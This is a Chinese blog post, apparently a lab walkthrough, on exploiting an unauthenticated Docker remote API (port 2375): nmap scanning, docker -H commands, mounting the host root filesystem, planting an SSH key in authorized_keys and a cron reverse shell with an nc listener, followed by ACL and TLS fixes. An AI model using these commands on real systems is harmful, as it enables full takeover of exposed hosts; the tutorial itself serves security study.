Docker未授权访问漏洞

最新推荐文章于 2023-11-13 07:00:00 发布
最新推荐文章于 2023-11-13 07:00:00 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: web 文章标签: docker 运维 容器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45933944/article/details/126651508
版权

文章目录

Docker未授权访问漏洞

什么是Docker

Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。

我们可以在服务器上创建不同的虚拟机,在不同的虚拟机上放置不同的应用,但是虚拟机开销比较高。利用Docker可以实现虚拟机隔离应用环境的功能。

漏洞原因

如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制访问来源的话,攻击者就可以通过Docker未授权来控制服务器

漏洞影响

攻击者利用 dockerclient 或者 http 直接请求就可以访问这个API,可能导致敏感信息泄露,也可以删除Docker上的数据。攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。

漏洞挖掘

实验地址:https://www.yijinglab.com/expc.do?ce=74d02af2-6e5f-4e77-bc01-71142d256b15

目标机器: CentOS7+Docker、IP:10.1.1.200

攻击机器:Kali+Docker、IP:10.1.1.100

1.信息收集

通过nmap对目标进行信息收集,发现如下端口开放

22端口:ssh默认端口

2375端口:docker远程操控(对远程docker deaom进行操作)

全端口扫描:nmap -sS -v -T4 -Pn -p- 10.1.1.200

请添加图片描述

2.通过浏览器访问端口

已知目标开放2375端口,通过浏览器进行访问,如果页面显示message “page not found” 代表存在漏洞

请添加图片描述

3.获取docker相关信息

  • info

请添加图片描述

  • images/json获取到镜像信息

请添加图片描述

漏洞利用

1.使用docker命令连接目标机器

通过docker client使用-H参数连接目标主机的docker,并使用ps -a命令查询目标系统运行的所有容器

docker -H tcp://10.1.1.200 ps -a    #列出所有容器

请添加图片描述

docker -H tcp://10.1.1.200 images	#列出所有镜像

请添加图片描述

2.进入容器

方法一
  • 列出所有容器时,查看已经退出停止的容器

请添加图片描述

  • 通过start命令启动一个已经停止的容器

请添加图片描述

  • 通过attach命令连接已启动的容器

请添加图片描述

到这里就获取到一个docker容器的权限(getshell)

方法二
  • 新运行一个容器并将entrypoint设置为/bin/bash或者/bin/sh,挂载点设置为服务器的根目录挂载至/mnt目录下(需要root权限启动docker)
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba(镜像id)

请添加图片描述

  • 首先kali生成id_rsa公钥:ssh-keygen -t rsa
  • 生成的公钥在/root/.ssh/ 目录下:

请添加图片描述

  • 将生成公钥写入到目标/root/.ssh/authorized_keys文件中:
    请添加图片描述

  • 在写入后即可通过使用ssh进行连接,获取宿主机的shell

请添加图片描述

3.docker未授权写定时任务获取shell

启动一个容器,挂载宿主机的目录(此前已挂载),之后将反弹shell的脚本写入到/etc/crontab中,攻击机nc -lvvp port会得到一个反弹的shell。将反弹shell的脚本写入到/var/spool/cron/root(centos系统)或/var/spool/cron/crontabs/root(ubuntu系统)

  • kali 开启监听

请添加图片描述

  • 写入反弹shell的脚本

请添加图片描述

  • getshell

请添加图片描述

修复docker未授权访问漏洞

  1. 设置ACL,只允许信任IP 连接对应接口
  2. 开启TLS,使用生成的证书进行认证

https://docs.docker.com/engine/security/protect-access/

ACL : 访问控制列表是一种基于包过滤的访问控制技术,它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。访问控制列表被广泛地应用于路由器三层交换机,借助于访问控制列表,可以有效地控制用户对网络的访问,从而最大程度地保障[网络安全]

TLS : 传输层安全性协议

Zst4rs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
docker容器漏洞_如何在2020年发现和修复Docker容器漏洞
cumi6497的博客
08-16 2563
docker容器漏洞Containerization allows engineering teams to create a sandbox environment in which to run and test applications. Containers are mostly made up of open-source images pulled in from docker hu...
授权访问Docker授权访问漏洞
最新发布
qq_68163788的博客
05-14 1682
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4594
配置开启Docker2375远程连接与解决Docker授权访问漏洞
容器安全防线】Docker攻击方式与防范技术探究
wangluoanquan111的博客
07-29 287
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。一个完整的Docker有以下几个部分组成:1、DockerClient客户端2、Docker Daemon守护进程3、Docker Image镜像4、DockerContainer容器
常用的30+种授权访问漏洞汇总
qq_50854662的博客
09-17 5192
常用的30+种授权访问漏洞汇总
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1494
docker api授权导致rce 漏洞修复
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1365
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
Docker容器安全最佳实践白皮书V1.0.pdf
12-14
* 1.3 更新docker到最新版本:这可以确保docker的安全补丁能够及时更新,防止已知的安全漏洞被攻击者利用。 * 1.4 只有受信任的用户才能控制docker守护进程:这可以防止授权的用户控制docker守护进程,导致安全...
Docker容器安全性解决方案.pdf
10-11
例如,可以使用 Docker 的安全机制来限制容器访问权限,防止授权访问等安全问题。 容器网络安全是指在容器之间或容器与外部网络之间的网络连接中,为了确保数据的安全传输,采取的一些安全机制和解决方案。...
0、漏洞说明.docx
04-21
15. Docker Daemon API授权访问漏洞:允许攻击者无需认证即可通过Docker守护进程API执行命令,对容器环境造成严重破坏。 16. Drupal系列漏洞:包括SQL注入、反序列化任意代码执行、远程代码执行等,这些漏洞极大...
Docker2375端口授权getshell
Is_Linmouren的博客
10-21 348
Docker2375端口授权getshell 靶机:192.168.196.133 利用条件:docker2375授权、有可启动的主机镜像 1、判断是否可以利用漏洞 扫描端口发现开放端口22和2375 docker -H tcp://192.168.196.133:2375 ps 可以成功执行docker命令 [root@localhost ~]# docker -H 192.168.196.133:2375 images REPOSITORY
Docker Remote API授权访问
lyink001的博客
12-16 1279
docker remote api获取服务器权限
关于docker remote api授权访问漏洞的学习与研究
07-16 614
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker安全漏洞
Songbl_的博客
06-30 685
Docker本身提供了加密的远程管理端口2376,配合CA证书,就能提供TLS连接了 生成需要的证书文件 注意设置好自己的目录 openssl genrsa -out ca-key.pem 4096 证书的相关信息,设置自己的 openssl req -x509 -sha256 -batch -subj '/C=CN/ST=Shanghai/L=Shanghai/O=Ghostcloud Co.,Ltd/OU=Laboratory/CN=www.XXX.cn' -new -days 365 -key ca
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
锋刃科技的博客
12-27 1278
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
Docker授权访问漏洞复现
m0_43397796的博客
12-13 2875
docker授权访问是怎么回事呢?docker授权访问是怎么回事相信大家都很熟悉,但是docker授权访问是怎么回事呢,下面就让小编带大家一起了解吧。 docker授权访问是怎么回事,其实就是docker授权访问是怎么回事,大家可能会很惊讶docker授权访问怎么会是这么回事呢?但事实就是这样,小编也感到非常惊讶。 这就是关于docker授权访问是怎么回事的事情了,大家有什么想法呢,欢迎在评论区告诉小编一起讨论哦!...
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值